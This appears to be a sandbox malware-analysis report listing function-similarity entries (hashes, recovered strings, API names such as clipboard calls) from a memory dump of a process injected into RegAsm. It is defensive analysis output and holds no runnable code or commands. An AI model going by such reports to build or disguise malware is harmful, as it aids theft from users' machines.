                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                      • Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
                                                      • Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
                                                      • Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $!$"$$$%$%$&$($)$*$+$,$-$.$.$.$0$0$1$2$4$4$4$5$6$8$:$;$;$<$=$>$>$?$?$@$B$C$D$D$F$H$J$L$M$N$N$N$O$P$R$T$U$V$X$Z$Z$Z$[$\$\$]$^$^$`$a$b$c$d$e$e$e$e$f$g$h$i$i$j$k$l$l$m$n$o$p$p$r$s$t$t$t$v$v$x$x$z$|$}$~$~$~
                                                      • API String ID: 0-1394229784
                                                      • Opcode ID: 6b5e8a3ef8ba662cab324718d7720a18ae6b7cc4d250dd71ea4c109fb1e4a02b
                                                      • Instruction ID: 78fde7a8102a4a25e3d516c1edb5f9b2f063fdb03dbd0bbcca9d4d838a68c62c
                                                      • Opcode Fuzzy Hash: 6b5e8a3ef8ba662cab324718d7720a18ae6b7cc4d250dd71ea4c109fb1e4a02b
                                                      • Instruction Fuzzy Hash: 3F22472190D7E9CDEB26C638CC587DDBEA15B56314F0841D9C19D6B3C2C7BA0B89CB26
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *$+$0$:$<$>$@$C$`$`$a$b$d$d$f$g$h$n$n$p$s$w$x$z${${$|$|$}
                                                      • API String ID: 0-334816167
                                                      • Opcode ID: fe3bbaaf78d73795ce0d9db7cf1905d738811f9555a388683196b7b178659806
                                                      • Instruction ID: 4ba09c738a8091425718d315f50eff196f5ba60e1b3feeb24fdbf3622366560b
                                                      • Opcode Fuzzy Hash: fe3bbaaf78d73795ce0d9db7cf1905d738811f9555a388683196b7b178659806
                                                      • Instruction Fuzzy Hash: 0BF1E521D087E98ADB32C67C8C443CDBFA15B97324F1943D9D4E9AB3D2C6780A46CB56
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                      • String ID: ($P$W$]$j$x
                                                      • API String ID: 2832541153-1642767450
                                                      • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                      • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                      • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                      • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 7]7N$9/,8$; >?$<'=0$LSJm$PVNR$R:e}$`{R2$agsy$p~rs$rz|x$sD/f$wkoq$~p~9
                                                      • API String ID: 0-2345621967
                                                      • Opcode ID: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                      • Instruction ID: bfc0c3310975af71fded0e8a17bd930ed1ccefcf7fefaebca231936fe6ab8075
                                                      • Opcode Fuzzy Hash: a9be2e0f6340cc52a81f7dbe1f742bb92054bc815233c9bebfa9ac53ecd4af8d
                                                      • Instruction Fuzzy Hash: 47C1367150C3958BD315CE2584A036BBFE1AFD6304F1889BDE4E11B386D63D8D0ACBA6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &$+$4$@$C$O$T$Y$Z$\$g$q$t
                                                      • API String ID: 0-2174627302
                                                      • Opcode ID: 17417fa3628cf7f5b04a789fadb982a2aa47c1a68916248c8b732c4e9718207f
                                                      • Instruction ID: 9695cd9248a7320cbd761fb78df0a02734abf8995342c504889e395b39462be9
                                                      • Opcode Fuzzy Hash: 17417fa3628cf7f5b04a789fadb982a2aa47c1a68916248c8b732c4e9718207f
                                                      • Instruction Fuzzy Hash: 7E728E7160C7818BD3249F38C4953AFBBE2ABD5314F194A3EE5D9873D2D67884858B07
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                      • API String ID: 0-2246970021
                                                      • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                      • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                      • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                      • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *mB$67$@iB$V3R5
                                                      • API String ID: 0-119712241
                                                      • Opcode ID: 580e8cf0a12e00fa1f36186f19b506b71ff840fcc0f6e836628e4f566f146029
                                                      • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                      • Opcode Fuzzy Hash: 580e8cf0a12e00fa1f36186f19b506b71ff840fcc0f6e836628e4f566f146029
                                                      • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                      • API String ID: 0-2430453506
                                                      • Opcode ID: f41f14918171499e701083ac4cca6cd69cf693930fc7e871dea7447ab30f5b7a
                                                      • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                      • Opcode Fuzzy Hash: f41f14918171499e701083ac4cca6cd69cf693930fc7e871dea7447ab30f5b7a
                                                      • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &=$0$5$D@6T$EF$zJyL
                                                      • API String ID: 0-3264166258
                                                      • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                      • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                      • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                      • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -$C\$Iz$[^$de
                                                      • API String ID: 0-3020956940
                                                      • Opcode ID: 48fb5841e8fc15a65971b2ccce4c7675603372e0af0c1bd974a24fdc44b1d18f
                                                      • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                      • Opcode Fuzzy Hash: 48fb5841e8fc15a65971b2ccce4c7675603372e0af0c1bd974a24fdc44b1d18f
                                                      • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                      • API String ID: 0-923305466
                                                      • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                      • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                      • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                      • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                      • API String ID: 0-923305466
                                                      • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                      • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                      • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                      • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                      • API String ID: 0-923305466
                                                      • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                      • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                      • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                      • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: &-$)R_X$[O_[$zusR
                                                      • API String ID: 0-3432275560
                                                      • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                      • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                      • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                      • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "w+y$?TUV$D@YO$^QRW
                                                      • API String ID: 0-2418547040
                                                      • Opcode ID: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
                                                      • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                      • Opcode Fuzzy Hash: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
                                                      • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #$$+oQ$?{;}$DF
                                                      • API String ID: 0-1090792222
                                                      • Opcode ID: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                      • Instruction ID: f8f0a3fc3e126b0df0e9da8d66218e0bc810a6f9e0fb1804998ec3192ea1b230
                                                      • Opcode Fuzzy Hash: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
                                                      • Instruction Fuzzy Hash: 34E102B4E043549FEB10DF28D942B5EBBB0FB86304F1085ADE598AB381D7758946CF86
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: in~x$kmbj$ydij
                                                      • API String ID: 0-2624003027
                                                      • Opcode ID: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                      • Instruction ID: f79569228283954ad57b9a6cc496d73d61da5c1ffc761606bfa780fd5c95cafa
                                                      • Opcode Fuzzy Hash: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
                                                      • Instruction Fuzzy Hash: A91245B5600A01CFC7248F24D8D16A7BBA2FF96314F18857ED4968B396E738E842CB55
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0$V$e
                                                      • API String ID: 0-3964817793
                                                      • Opcode ID: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
                                                      • Instruction ID: 59230c03b5a3a3693ef44b30c97d38267524f76adfdce6de0efbbb4ceb4d7fde
                                                      • Opcode Fuzzy Hash: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
                                                      • Instruction Fuzzy Hash: 9822E77290C7408BD724DF38C4913AEBBD2ABD5324F194A2EE5E9973D1DA388941CB47
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 67$V3R5$dB
                                                      • API String ID: 0-2543814982
                                                      • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                      • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                      • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                      • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0$8
                                                      • API String ID: 0-46163386
                                                      • Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                      • Instruction ID: d40c633f6dc63a9644a0400b392de52ca6438bdc0a59f23ad90aea60c423d6c9
                                                      • Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
                                                      • Instruction Fuzzy Hash: BC7213716087409FD714CF18C880BABBBE1EB88314F04892EF9899B391D379D948DF96
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "*B$B*B
                                                      • API String ID: 0-3938277345
                                                      • Opcode ID: 5d36d8bc59f7a840cee538beabc9d9f1196a2cbbe69a0d8c195e412fdac48f78
                                                      • Instruction ID: c0ff169c622c87bee100c6609ea31c9af3570951461718032b7520edbb3c94ef
                                                      • Opcode Fuzzy Hash: 5d36d8bc59f7a840cee538beabc9d9f1196a2cbbe69a0d8c195e412fdac48f78
                                                      • Instruction Fuzzy Hash: 53421276A00211DFCB18CF68DC90AAEB7B2FF49310F598179E905AB395D734AD11CB84
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$kl
                                                      • API String ID: 0-2631956018
                                                      • Opcode ID: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                      • Instruction ID: 6e525d0f0299ed0e456b3adafb39e2bcab09d4ef44449d93680b2b5d8b67f0fb
                                                      • Opcode Fuzzy Hash: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
                                                      • Instruction Fuzzy Hash: 1FE1173A218709CBCB189F78EC5127A73F1FF4A741F4A887DD8818B2A1E7B99950C714
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BE$de
                                                      • API String ID: 0-1272349043
                                                      • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                      • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                      • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                      • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )$IEND
                                                      • API String ID: 0-707183367
                                                      • Opcode ID: 40dacf743ae77398cb425da77a9222dce02220864417a92cb34fecf70b6e0061
                                                      • Instruction ID: 150efe4bc442e3656c1a555dd4695a78e1d3107f99c29cf50d30224799849ada
                                                      • Opcode Fuzzy Hash: 40dacf743ae77398cb425da77a9222dce02220864417a92cb34fecf70b6e0061
                                                      • Instruction Fuzzy Hash: 96D1BFB19083449FD710DF15D841B5BBBE4AB94308F14492EFA98AB3C2D779E908CB97
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: +oQ$?{;}
                                                      • API String ID: 0-1414831546
                                                      • Opcode ID: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                      • Instruction ID: f7e0cf01948a060ca3ae4ae96257901d3d9473cfc3be429b8585dccf822635a3
                                                      • Opcode Fuzzy Hash: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
                                                      • Instruction Fuzzy Hash: BCB1BFB4E043189FEB20DF68D942B9EBBB0FB45304F1081ADE158AB381D7758946CF96
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Fg$RU]l
                                                      • API String ID: 0-3680832515
                                                      • Opcode ID: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                      • Instruction ID: 6f8db59bce85ef316af4e5eced37d01641f7d5c841364d3efc2c21db6cf2a903
                                                      • Opcode Fuzzy Hash: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
                                                      • Instruction Fuzzy Hash: 2171087120D3808BE7398F25D8A57EB7BD2EBD2304F58996DC0C987392DB78440ACB56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: O28+$h
                                                      • API String ID: 0-657163135
                                                      • Opcode ID: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                      • Instruction ID: 943cae955c8ebe7c4b26d457fd1afafbf5e793f4316e69c7cecf830d1c43eab0
                                                      • Opcode Fuzzy Hash: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
                                                      • Instruction Fuzzy Hash: B561BE32B887258BD3149A38A8901B7F791EB55350F88473EDD96873C2E63C9D09C3DA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AzB$`rB
                                                      • API String ID: 0-365317308
                                                      • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                      • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                      • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                      • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AzB$`rB
                                                      • API String ID: 0-365317308
                                                      • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                      • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                      • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                      • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c$
                                                      • API String ID: 0-2516980088
                                                      • Opcode ID: 3c7936fc6ee2aea87740d9eaff8fe823a77b75e4903c792a35abcdd5a2d9dcbb
                                                      • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                      • Opcode Fuzzy Hash: 3c7936fc6ee2aea87740d9eaff8fe823a77b75e4903c792a35abcdd5a2d9dcbb
                                                      • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: f
                                                      • API String ID: 2994545307-1993550816
                                                      • Opcode ID: 69c56cbd072c103c916165a985ece037ff150be1b605a3a6d61b24965126020f
                                                      • Instruction ID: c6061003a35e321c419c30bd02a3c4e1c0b56f4f8cbc670ef9e4360bbe252bef
                                                      • Opcode Fuzzy Hash: 69c56cbd072c103c916165a985ece037ff150be1b605a3a6d61b24965126020f
                                                      • Instruction Fuzzy Hash: 7722EF756083518FD718CF25C880A2BBBE2BBC9314F199A2DE4D587391DBB4EC06CB46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: ,)*k
                                                      • API String ID: 2994545307-1228391949
                                                      • Opcode ID: 869930153e3630061cfc2212e87621c06b0f7d623c5796ac555c0ebedb5d3c29
